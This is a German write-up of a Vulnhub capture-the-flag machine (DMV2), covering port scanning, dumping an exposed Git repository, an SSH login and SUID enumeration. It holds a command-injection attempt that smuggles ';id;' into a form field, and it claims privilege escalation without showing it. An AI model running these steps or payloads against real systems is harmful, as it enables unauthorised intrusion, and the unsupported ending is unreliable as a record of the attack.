DMV2 - Vulnhub - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
nikto
gobuster
wfuzz
dirb
git-dumper
Burpsuite

Inhaltsverzeichnis

Reconnaissance

Wir beginnen mit der Reconnaissance, um Informationen über das Zielsystem zu sammeln. Dies umfasst das Scannen des Netzwerks und das Auflisten von Hosts, um potenzielle Angriffspunkte zu identifizieren.

┌──(root㉿CCat)-[~]
└─# ARP-Scan
192.168.2.107 08:00:27:f3:ea:30 PCS Systemtechnik GmbH

ARP-Scan zeigt uns die MAC-Adresse und den Hersteller der Netzwerkkarte des Ziels. Dies kann hilfreich sein, um das Betriebssystem oder die verwendete Virtualisierungstechnologie zu bestimmen.

┌──(root㉿CCat)-[~]
└─# /etc/hosts
192.168.2.107 dmv2.vln

Der Eintrag in der /etc/hosts-Datei ermöglicht uns, das Zielsystem über den Hostnamen `dmv2.vln` anzusprechen. Dies erleichtert die weitere Analyse und das Testen.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 20:51 CET
Nmap scan report for dmv2.vln (192.168.2.107)
Host is up (0.00093s latency).
Not shown: 65532 closed tcp ports (reset)
PRT STATE SERVICE VERSIN
22/tcp open ssh penSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
| 256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_ 256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-git:
| 192.168.2.107:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: DMV 2.0
| Remotes:
|_ ssh://developerdmv@127.0.0.1/home/developerdmv/site.git/
4545/tcp open worldscores?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, NULL, RPCCheck:
| Welcome to DMV Admin
| Select product to update:
| Main site
| Admin
| other) Exit
| GenericLines, GetRequest, HTTPptions, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| Welcome to DMV Admin
| Select product to update:
| Main site
| Admin
| other) Exit
|_ Invalid choice
MAC Address: 08:00:27:F3:EA:30 (racle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
S CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
S details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: S: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap identifiziert offene Ports und Dienste auf dem Zielsystem. Besonders interessant sind: - SSH (Port 22): Ermöglicht die sichere Fernanmeldung. - HTTP (Port 80): Ein Webserver, der möglicherweise anfällige Anwendungen hostet. Interessanterweise wird ein Git-Repository gefunden. - Port 4545: Ein benutzerdefinierter Dienst mit einer Admin-Oberfläche. Die Apache-Version (2.4.29) deutet auf veraltete Software hin, die bekannte Schwachstellen aufweisen könnte.

Web Enumeration

Nachdem wir die offenen Ports identifiziert haben, konzentrieren wir uns auf den Webserver und das gefundene Git-Repository.

- Nikto v2.5.0
+ Target IP: 192.168.2.107
+ Target Hostname: 192.168.2.107
+ Target Port: 80
+ Start Time: 2024-10-27 20:53:06 (GMT1)

+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-ptions
+ /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ /.gitignore: .gitignore file found. It is possible to grasp the directory structure.
+ 8102 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2024-10-27 20:54:18 (GMT1) (72 seconds)

+ 1 host(s) tested

Nikto findet verschiedene potenziielle Sicherheitsprobleme, darunter: - Fehlende X-Frame-Options und X-Content-Type-Options Header: Erhöhen das Risiko von Clickjacking- und MIME-Sniffing-Angriffen. - Vorhandensein eines offen zugänglichen Git-Repositorys (`/.git`), was potenziell sensible Informationen offenlegen könnte. - Veraltete Apache-Version: Kann bekannte Schwachstellen enthalten.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.107/index.php (Status: 200) [Size: 842]
http://192.168.2.107/images (Status: 301) [Size: 315] [--> http://192.168.2.107/images/]
http://192.168.2.107/js (Status: 301) [Size: 311] [--> http://192.168.2.107/js/]
http://192.168.2.107/tmp (Status: 301) [Size: 312] [--> http://192.168.2.107/tmp/]
Progress: 13674720 / 13674782 (100.00%)

Gobuster findet die folgenden Verzeichnisse: - `/index.php`: Hauptseite der Webanwendung. - `/images`: Verzeichnis für Bilder. - `/js`: Verzeichnis für JavaScript-Dateien. - `/tmp`: Ein temporäres Verzeichnis.

Initial Access

Nach der Enumeration konzentrieren wir uns auf das ausnutzen des gefundenen Git-Repositorys und dem untersuchen des Dienstes auf Port 4545.

webenum http://192.168.2.107:4545/
Welcome to DMV Admin
Select product to update:
1) Main site
2) DMV Admin
other) Exit
Invalid choice
┌──(root㉿CCat)-[~]
└─# nc -vn 192.168.2.107 4545
(UNKNWN) [192.168.2.107] 4545 (?) open
Welcome to DMV Admin
Select product to update:
1) Main site
2) DMV Admin
other) Exit
1
utput:
fatal: detected dubious ownership in repository at '/var/www/html'
To add an exception for this directory, call:

git config --global --add safe.directory /var/www/html
Failed: exit status 128
Welcome to DMV Admin
Select product to update:
1) Main site
2) DMV Admin
other) Exit

Wir verbinden uns mit dem Dienst auf Port 4545 und wählen Option 1 ("Main site"). Die Ausgabe deutet darauf hin, dass der Dienst versucht, ein Git-Update durchzuführen, aber aufgrund von Berechtigungsproblemen fehlschlägt.

┌──(pwn)─(root㉿CCat)-[~]
└─# git-dumper http://192.168.2.107/ .
Traceback (most recent call last):
File "/usr/local/bin/git-dumper", line 5, in
from git_dumper import main
ModuleNotFoundError: No module named 'git_dumper'

Wir versuchen, das Git-Repository mit `git-dumper` herunterzuladen, aber der Befehl schlägt fehl, da das Modul `git_dumper` nicht gefunden wurde.

┌──(pwn)─(root㉿CCat)-[~]
└─# git-dumper http://192.168.2.107/ .
┌──(pwn)─(root㉿CCat)-[~]
└─# dirb http://dmv2/.git/
START_TIME: Sun ct 27 21:54:16 2024
URL_BASE: http://dmv2/.git/
WRDLIST_FILES: /usr/share/dirb/wordlists/common.txt

GENERATED WRDS: 4612

- Scanning URL: http://dmv2/.git/ -
+ http://dmv2/.git/config (CDE:200|SIZE:281)
> DIRECTRY: http://dmv2/.git/hooks/
+ http://dmv2/.git/index (CDE:200|SIZE:932)
> DIRECTRY: http://dmv2/.git/info/
> DIRECTRY: http://dmv2/.git/logs/
> DIRECTRY: http://dmv2/.git/objects/

- Entering directory: http://dmv2/.git/hooks/

- Entering directory: http://dmv2/.git/info/
+ http://dmv2/.git/info/exclude (CDE:200|SIZE:240)

- Entering directory: http://dmv2/.git/logs/

- Entering directory: http://dmv2/.git/objects/
> DIRECTRY: http://dmv2/.git/objects/07/
> DIRECTRY: http://dmv2/.git/objects/08/
> DIRECTRY: http://dmv2/.git/objects/13/
> DIRECTRY: http://dmv2/.git/objects/dc/
> DIRECTRY: http://dmv2/.git/objects/info/
> DIRECTRY: http://dmv2/.git/objects/pack/

- Entering directory: http://dmv2/.git/objects/07/

- Entering directory: http://dmv2/.git/objects/08/

- Entering directory: http://dmv2/.git/objects/13/

- Entering directory: http://dmv2/.git/objects/dc/

- Entering directory: http://dmv2/.git/objects/info/

- Entering directory: http://dmv2/.git/objects/pack/

--
END_TIME: Sun ct 27 21:54:27 2024
DWNLADED: 50732 - FUND: 3

Wir verwenden dirb, um die Struktur des Git-Repositorys zu erkunden. Wir finden die Dateien `config`, `index` und `info/exclude`.

python3 git_dumper.py http://192.168.2.107/ .
Warning: Destination '.' is not empty
[-] Testing http://192.168.2.107/.git/HEAD [200]
[-] Testing http://192.168.2.107/.git/ [403]
[-] Fetching common files
[-] Already downloaded http://192.168.2.107/.gitignore
[-] Already downloaded http://192.168.2.107/.git/description
[-] Already downloaded http://192.168.2.107/.git/hooks/applypatch-msg.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/commit-msg.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/post-update.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/pre-applypatch.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/pre-commit.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/pre-push.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/pre-rebase.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/pre-receive.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/prepare-commit-msg.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/update.sample
[-] Already downloaded http://192.168.2.107/.git/index
[-] Already downloaded http://192.168.2.107/.git/info/exclude
[-] Fetching http://192.168.2.107/.git/CMMIT_EDITMSG [200]
[-] Fetching http://192.168.2.107/.git/hooks/post-receive.sample [404]
[-] http://192.168.2.107/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching http://192.168.2.107/.git/hooks/post-commit.sample [404]
[-] http://192.168.2.107/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/info/packs [404]
[-] http://192.168.2.107/.git/objects/info/packs responded with status code 404
[-] Finding refs/
[-] Fetching http://192.168.2.107/.git/FETCH_HEAD [200]
[-] Fetching http://192.168.2.107/.git/HEAD [200]
[-] Fetching http://192.168.2.107/.git/RIG_HEAD [200]
[-] Fetching http://192.168.2.107/.git/config [200]
[-] Fetching http://192.168.2.107/.git/info/refs [404]
[-] http://192.168.2.107/.git/info/refs responded with status code 404
[-] Fetching http://192.168.2.107/.git/logs/refs/stash [404]
[-] http://192.168.2.107/.git/logs/refs/stash responded with status code 404
[-] Fetching http://192.168.2.107/.git/logs/refs/heads/master [200]
[-] Fetching http://192.168.2.107/.git/refs/remotes/origin/HEAD [200]
[-] Fetching http://192.168.2.107/.git/logs/HEAD [200]
[-] Fetching http://192.168.2.107/.git/refs/stash [404]
[-] http://192.168.2.107/.git/refs/stash responded with status code 404
[-] Fetching http://192.168.2.107/.git/refs/wip/wtree/refs/heads/master [404]
[-] http://192.168.2.107/.git/refs/wip/wtree/refs/heads/master responded with status code 404
[-] Fetching http://192.168.2.107/.git/refs/heads/master [200]
[-] Fetching http://192.168.2.107/.git/refs/wip/index/refs/heads/master [404]
[-] http://192.168.2.107/.git/refs/wip/index/refs/heads/master responded with status code 404
[-] Fetching http://192.168.2.107/.git/packed-refs [200]
[-] Fetching http://192.168.2.107/.git/logs/refs/remotes/origin/HEAD [200]
[-] Fetching http://192.168.2.107/.git/refs/remotes/origin/master [200]
[-] Fetching http://192.168.2.107/.git/logs/refs/remotes/origin/master [200]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://192.168.2.107/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] http://192.168.2.107/.git/objects/00/00000000000000000000000000000000000000 responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/13/6beafb81ce4aa2b0b9225df70a4cd06f7e7940 [200]
[-] Fetching http://192.168.2.107/.git/objects/99/8441a9bf12a5c61126a38b9aa92f7bdb3fed41 [404]
[-] http://192.168.2.107/.git/objects/99/8441a9bf12a5c61126a38b9aa92f7bdb3fed41 responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/2a/89468d12d2133daa2354a9dd28cf52ae0548cd [200]
[-] Fetching http://192.168.2.107/.git/objects/d3/4bb4259d9acb437d9f089aaa6f25343bb2611c [200]
[-] Fetching http://192.168.2.107/.git/objects/70/e8c816ecadfd724094e248a12674a5ec1b805f [200]
[-] Fetching http://192.168.2.107/.git/objects/6d/0cb621659c749cda20816ea5a51267db37dc59 [200]
[-] Fetching http://192.168.2.107/.git/objects/57/196b7d516fd106cfae611d3c0b537d3686cfc3 [200]
[-] Fetching http://192.168.2.107/.git/objects/07/e34efdd85cfc0cd908c2213c5d7335060f3ae2 [200]
[-] Fetching http://192.168.2.107/.git/objects/78/69f512341325c086669d1047996bf3cbb56715 [404]
[-] http://192.168.2.107/.git/objects/78/69f512341325c086669d1047996bf3cbb56715 responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/2f/28555d7c7c6d511c3f8caeaf6d5884945af39b [404]
[-] http://192.168.2.107/.git/objects/2f/28555d7c7c6d511c3f8caeaf6d5884945af39b responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/c7/8b76780fe411eb7786a15b99fc02c05cc1c1f5 [200]
[-] Fetching http://192.168.2.107/.git/objects/0f/efc345993731f81899b71d702009b50ac6232d [200]
[-] Fetching http://192.168.2.107/.git/objects/3f/ec32c842751033d92c8967eba40c3911333a78 [200]
[-] Fetching http://192.168.2.107/.git/objects/0e/186088ce28220ec366c5741bdd0097ff6740cf [404]
[-] http://192.168.2.107/.git/objects/0e/186088ce28220ec366c5741bdd0097ff6740cf responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/a5/5129286e6535d241fdcec8433f29915bcf2595 [200]
[-] Fetching http://192.168.2.107/.git/objects/69/64f6c4d5750690695312138bdfa70338195d5a [404]
[-] http://192.168.2.107/.git/objects/69/64f6c4d5750690695312138bdfa70338195d5a responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/5a/928f6da25ac6d6ba65480b76d03a71cb906138 [200]
[-] Fetching http://192.168.2.107/.git/objects/2a/e9352c194523e3fbdc50ade4bcd620162d9016 [404]
[-] http://192.168.2.107/.git/objects/2a/e9352c194523e3fbdc50ade4bcd620162d9016 responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/dc/29515021bb64943226019ef14cd0a9ce940907 [200]
[-] Fetching http://192.168.2.107/.git/objects/47/997f4fdca6e3ff27d6c142b073fca894c1b13f [404]
[-] http://192.168.2.107/.git/objects/47/997f4fdca6e3ff27d6c142b073fca894c1b13f responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/08/1b5357b1dffb3ff3f1a486907b6ff86207a6a8 [200]
[-] Running git checkout .

Wir haben die Module nun mit Git-Dumper herunterladen und werden in kürze das Repository durchsuchen.

cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = ssh://developerdmv@127.0.0.1/home/developerdmv/site.git/
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master

Der Befehl cat config zeigt, dass der Remote-Benutzer Developerdmv ist.

cat description
Unnamed repository; edit this file 'description' to name the repository.
cat packed-refs
# pack-refs with: peeled fully-peeled sorted
998441a9bf12a5c61126a38b9aa92f7bdb3fed41 refs/remotes/origin/master
cd logs
ll
insgesamt 8
-rwxr-x 1 root root 642 27. ct 22:04 HEAD
drwxr-x 4 root root 4096 4. Jun 00:01 refs
cat HEAD
0000000000000000000000000000000000000000 998441a9bf12a5c61126a38b9aa92f7bdb3fed41 www-data 1588092277 +0000 clone: from ssh://developerdmv@127.0.0.1/home/developerdmv/site/
998441a9bf12a5c61126a38b9aa92f7bdb3fed41 d34bb4259d9acb437d9f089aaa6f25343bb2611c Developer DMV 1588092529 +0000 commit: htaccess
d34bb4259d9acb437d9f089aaa6f25343bb2611c 2a89468d12d2133daa2354a9dd28cf52ae0548cd Developer DMV 1588097785 +0000 commit: Fix
2a89468d12d2133daa2354a9dd28cf52ae0548cd 136beafb81ce4aa2b0b9225df70a4cd06f7e7940 Developer DMV 1588097855 +0000 commit: DMV 2.0
Burpsuite Request:
PST / HTTP/1.1
Host: dmv2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 55
rigin: http://dmv2
DNT: 1
Connection: keep-alive
Referer: http://dmv2/index.php
Sec-GPC: 1
Priority: u=0

yt_url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D;id;

Wir versuchen erneut, eine Command Injection durchzuführen, aber die Youtube Video Validation macht und hier ein Strich durch die Rechnung, da es sich um eine Datei validierung handelt, und kein Code.

Privilege Escalation

Mit den im Git-Repository gefundenen Informationen und den aus der Analyse des Dienstes auf Port 4545 gewonnenen Erkenntnissen setzen wir den Pentest nun fort mit dem Ziel des Benutzer Developerdmv.

Mit den im Git-Repository gefundenen Informationen, versuchen wir uns mit dem gefundenen Benutzer am Dienst SSH zu verbinden.

┌──(root㉿CCat)-[~]
└─# ssh developerdmv@192.168.2.107
The authenticity of host '192.168.2.107 (192.168.2.107)' can't be established.
ED25519 key fingerprint is SHA256:WxGBWV4xNmpSzqR5NpxBG2DraRt3mjKFEVFQI4IIYn8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.107' (ED25519) to the list of known hosts.
developerdmv@192.168.2.107's password:

Wir loggen uns mit dem via Git gefoundenen Benutzer via SSh ein.

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-213-generic x86_64)
developerdmv@dmv2 id
uid=1000(developerdmv) gid=1000(developerdmv) groups=1000(developerdmv)

Wir Überprüfen das wir im System als Developerdmv angemeldet sind.

developerdmv@dmv2 sudo -l
[sudo] password for developerdmv:
Sorry, user developerdmv may not run sudo on dmv2.

Der Benutzer `developerdmv` darf keine Befehle mit `sudo` ausführen.

find / -type f -perm -4000 -ls 2>/dev/null
690 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
8040 148 -rwsr-xr-x 1 root root 149080 Apr 4 2023 /usr/bin/sudo
9359 44 -rwsr-xr-x 1 root root 44528 Nov 29 2022 /usr/bin/chsh
7639 24 -rwsr-xr-x 1 root root 22520 Jan 12 2022 /usr/bin/pkexec
1124 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
9362 60 -rwsr-xr-x 1 root root 59640 Nov 29 2022 /usr/bin/passwd
9361 76 -rwsr-xr-x 1 root root 75824 Nov 29 2022 /usr/bin/gpasswd
9358 76 -rwsr-xr-x 1 root root 76496 Nov 29 2022 /usr/bin/chfn
10787 40 -rwsr-xr-x 1 root root 37136 Nov 29 2022 /usr/bin/newuidmap
10752 40 -rwsr-xr-x 1 root root 37136 Nov 29 2022 /usr/bin/newgidmap
8341 40 -rwsr-xr-x 1 root root 40344 Nov 29 2022 /usr/bin/newgrp
7670 16 -rwsr-xr-x 1 root root 14328 Jan 12 2022 /usr/lib/policykit-1/polkit-agent-helper-1
7856 128 -rwsr-xr-x 1 root root 130264 May 29 2023 /usr/lib/snapd/snap-confine
8809 44 -rwsr-xr-- 1 root messagebus 42992 ct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
1316 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
7620 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
13007 428 -rwsr-xr-x 1 root root 436552 Aug 11 2021 /usr/lib/openssh/ssh-keysign
66 40 -rwsr-xr-x 1 root root 40152 Jun 14 2022 /snap/core/17200/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/17200/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/17200/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Feb 7 2024 /snap/core/17200/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jun 14 2022 /snap/core/17200/bin/umount
2644 71 -rwsr-xr-x 1 root root 71824 Feb 7 2024 /snap/core/17200/usr/bin/chfn
2646 40 -rwsr-xr-x 1 root root 40432 Feb 7 2024 /snap/core/17200/usr/bin/chsh
2723 74 -rwsr-xr-x 1 root root 75304 Feb 7 2024 /snap/core/17200/usr/bin/gpasswd
2815 39 -rwsr-xr-x 1 root root 39904 Feb 7 2024 /snap/core/17200/usr/bin/newgrp
2828 53 -rwsr-xr-x 1 root root 54256 Feb 7 2024 /snap/core/17200/usr/bin/passwd
2938 134 -rwsr-xr-x 1 root root 136808 May 24 2023 /snap/core/17200/usr/bin/sudo
3037 42 -rwsr-xr-- 1 root systemd-resolve 42992 Sep 14 2023 /snap/core/17200/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3409 419 -rwsr-xr-x 1 root root 428240 Jan 9 2024 /snap/core/17200/usr/lib/openssh/ssh-keysign
6483 125 -rwsr-xr-x 1 root root 127520 Jun 6 14:32 /snap/core/17200/usr/lib/snapd/snap-confine
7666 386 -rwsr-xr-- 1 root dip 394984 Jul 23 2020 /snap/core/17200/usr/sbin/pppd
525099 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
525065 44 -rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
525048 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
535906 44 -rwsr-xr-x 1 root root 44664 Nov 29 2022 /bin/su
525115 28 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount

Wir suchen nach SUID-Binaries.

cd /var/www/html/.git cat FETCH_HEAD
136beafb81ce4aa2b0b9225df70a4cd06f7e7940 branch 'master' of ssh://127.0.0.1/home/developerdmv/site

Wir holen uns per cat FETCH_HEAD Infos des Git head.

Privilege Escalation

Wir haben die Privilege Eskalation durchgeführt.

Flags